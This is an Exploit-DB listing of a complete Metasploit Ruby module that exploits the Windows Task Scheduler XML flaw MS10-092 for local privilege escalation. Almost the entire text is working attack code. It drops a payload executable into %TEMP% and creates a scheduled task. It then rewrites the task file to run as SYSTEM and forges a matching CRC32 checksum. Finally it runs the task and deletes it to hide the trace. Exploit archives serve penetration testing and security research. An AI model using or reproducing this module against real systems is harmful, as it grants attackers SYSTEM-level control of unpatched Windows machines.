Microsoft Windows – Task Scheduler ‘.XML’ Local Privilege Escalation (MS10-092) (Metasploit)

  • 作者: Metasploit
    日期: 2012-07-19
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  • 来源:https://www.exploit-db.com/exploits/19930/
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    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##
    
    require 'msf/core'
    require 'msf/core/post/common'
    require 'rex'
    require 'zlib'
    
    
    class Metasploit3 < Msf::Exploit::Local
    
    	include Msf::Exploit::EXE
    	include Msf::Post::Common
    	include Msf::Post::File
    
    	def initialize(info={})
    		super(update_info(info, {
    			'Name'=> 'Windows Escalate Task Scheduler XML Privilege Escalation',
    			'Description' => %q{
    					This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
    				When processing task files, the Windows Task Scheduler only uses a CRC32
    				checksum to validate that the file has not been tampered with. Also, In a default
    				configuration, normal users can read and write the task files that they have
    				created. By modifying the task file and creating a CRC32 collision, an attacker
    				can execute arbitrary commands with SYSTEM privileges.
    
    				NOTE: Thanks to webDEViL for the information about disable/enable.
    			},
    			'License' => MSF_LICENSE,
    			'Author'=> [ 'jduck' ],
    			'Version' => '$Revision$',
    			'Arch'=> [ ARCH_X86, ARCH_X86_64 ],
    			'Platform'=> [ 'windows' ],
    			'SessionTypes'=> [ 'meterpreter' ],
    			'Targets' =>
    				[
    					[ 'Windows Vista, 7, and 2008', {} ],
    				],
    			'References'=>
    				[
    					[ 'OSVDB', '68518' ],
    					[ 'CVE', '2010-3338' ],
    					[ 'BID', '44357' ],
    					[ 'MSB', 'MS10-092' ],
    					[ 'EDB', 15589 ]
    				],
    			'DisclosureDate'=> 'Sep 13 2010',
    			'DefaultTarget' => 0
    		}))
    
    		register_options([
    			OptString.new("CMD",[ false, "Command to execute instead of a payload" ]),
    			OptString.new("TASKNAME", [ false, "A name for the created task (default random)" ]),
    		])
    
    	end
    
    	def check
    		vuln = false
    		winver = sysinfo["OS"]
    		affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
    		affected.each { |v|
    			if winver.include? v
    				vuln = true
    				break
    			end
    		}
    		if not vuln
    			return Exploit::CheckCode::Safe
    		end
    
    		return Exploit::CheckCode::Appears
    	end
    
    	def exploit
    		if sysinfo["Architecture"] =~ /wow64/i
    			#
    			# WOW64 Filesystem Redirection prevents us opening the file directly. To make matters
    			# worse, meterpreter/railgun creates things in a new thread, making it much more
    			# difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this,
    			# offer a workaround and error out.
    			#
    			print_error("Running against via WOW64 is not supported, try using an x64 meterpreter...")
    			return
    		end
    
    		if check == Exploit::CheckCode::Safe
    			print_error("#{winver} is not vulnerable.")
    			return
    		end
    
    		taskname = datastore["TASKNAME"] || nil
    		cmd = datastore["CMD"] || nil
    		upload_fn = nil
    
    		tempdir = session.fs.file.expand_path("%TEMP%")
    		if not cmd
    			# Get the exe payload.
    			exe = generate_payload_exe
    			#and placing it on the target in %TEMP%
    			tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
    			cmd = tempdir + "\\" + tempexename + ".exe"
    
    			print_status("Preparing payload at #{cmd}")
    			write_file(cmd, exe)
    		else
    			print_status("Using command: #{cmd}")
    		end
    
    		#
    		# Create a new task to do our bidding, but make sure it doesn't run.
    		#
    		taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
    		sysdir = session.fs.file.expand_path("%SystemRoot%")
    		taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
    
    		print_status("Creating task: #{taskname}")
    		cmdline = "schtasks.exe /create /tn #{taskname} /tr \"#{cmd}\" /sc monthly /f"
    #		print_debug("Will Execute:\n\t#{cmdline}")
    		exec_schtasks(cmdline, "create the task")
    
    		#
    		# Read the contents of the newly creates task file
    		#
    		content = read_task_file(taskname, taskfile)
    
    		#
    		# Double-check that we got what we expect.
    		#
    		if content[0,2] != "\xff\xfe"
    			#
    			# Convert to unicode, since it isn't already
    			#
    			content = content.unpack('C*').pack('v*')
    		else
    			#
    			# NOTE: we strip the BOM here to exclude it from the crc32 calculation
    			#
    			content = content[2,content.length]
    		end
    
    
    		#
    		# Record the crc32 for later calculations
    		#
    		old_crc32 = crc32(content)
    		print_status("Original CRC32: 0x%x" % old_crc32)
    
    		#
    		# Convert the file contents from unicode
    		#
    		content = content.unpack('v*').pack('C*')
    
    		#
    		# Mangle the contents to now run with SYSTEM privileges
    		#
    		content.gsub!('LeastPrivilege', 'HighestAvailable')
    		content.gsub!(/<UserId>.*<\/UserId>/, '<UserId>S-1-5-18</UserId>')
    		content.gsub!(/<Author>.*<\/Author>/, '<Author>S-1-5-18</Author>')
    		#content.gsub!('<LogonType>InteractiveToken</LogonType>', '<LogonType>Password</LogonType>')
    		content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"')
    		content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"')
    		content << "<!-- ZZ -->"
    
    		#
    		# Convert it back to unicode
    		#
    		content = Rex::Text.to_unicode(content)
    
    		#
    		# Fix it so the CRC matches again
    		#
    		fix_crc32(content, old_crc32)
    		new_crc32 = crc32(content)
    		print_status("Final CRC32: 0x%x" % new_crc32)
    
    		#
    		# Write the new content back
    		#
    		print_status("Writing our modified content back...")
    		fd = session.fs.file.new(taskfile, "wb")
    		fd.write "\xff\xfe" + content
    		fd.close
    
    		#
    		# Validate our results
    		#
    		print_status("Validating task: #{taskname}")
    		exec_schtasks("schtasks.exe /query /tn #{taskname}", "validate the task")
    
    		#
    		# Run the task :-)
    		#
    		print_status("Disabling the task...")
    		exec_schtasks("schtasks.exe /change /tn #{taskname} /disable", "disable the task")
    
    		print_status("Enabling the task...")
    		exec_schtasks("schtasks.exe /change /tn #{taskname} /enable", "enable the task")
    
    		print_status("Executing the task...")
    		exec_schtasks("schtasks.exe /run /tn #{taskname}", "run the task")
    
    
    		#
    		# And delete it.
    		#
    		print_status("Deleting the task...")
    		exec_schtasks("schtasks.exe /delete /f /tn #{taskname}", "delete the task")
    	end
    
    	def crc32(data)
    		table = Zlib.crc_table
    		crc = 0xffffffff
    		data.unpack('C*').each { |b|
    			crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
    		}
    		crc
    	end
    
    	def fix_crc32(data, old_crc)
    		#
    		# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
    		# reversed from Microsoft's code)
    		#
    		bwd_table = [
    			0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
    			0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
    			0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
    			0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
    			0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
    			0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
    			0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
    			0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
    			0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
    			0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
    			0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
    			0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
    			0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
    			0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
    			0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
    			0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
    			0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
    			0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
    			0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
    			0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
    			0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
    			0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
    			0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
    			0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
    			0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
    			0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
    			0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
    			0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
    			0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
    			0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
    			0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
    			0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
    			0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
    			0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
    			0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
    			0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
    			0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
    			0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
    			0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
    			0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
    			0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
    			0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
    			0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
    			0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
    			0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
    			0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
    			0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
    			0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
    			0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
    			0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
    			0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
    			0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
    			0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
    			0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
    			0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
    			0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
    			0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
    			0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
    			0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
    			0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
    			0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
    			0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
    			0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
    			0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
    		]
    
    		crc = crc32(data[0, data.length - 12])
    		data[-12, 4] = [crc].pack('V')
    
    		data[-12, 12].unpack('C*').reverse.each { |b|
    			old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
    		}
    		data[-12, 4] = [old_crc].pack('V')
    	end
    
    	def exec_schtasks(cmdline, purpose)
    		cmdline = "/c #{cmdline.strip} && echo SCHELEVATOR"
    		lns = cmd_exec('cmd.exe', cmdline)
    
    		success = false
    		lns.each_line { |ln|
    			ln.chomp!
    			if ln =~ /^SUCCESS\:\s/
    				success = true
    				print_status(ln)
    			else
    				print_status(ln)
    			end
    		}
    	end
    
    
    	def read_task_file(taskname, taskfile)
    		print_status("Reading the task file contents from #{taskfile}...")
    
    		# Can't read the file directly on 2008?
    		content = ''
    		fd = session.fs.file.new(taskfile, "rb")
    		until fd.eof?
    			content << fd.read
    		end
    		fd.close
    
    		content
    	end
    
    end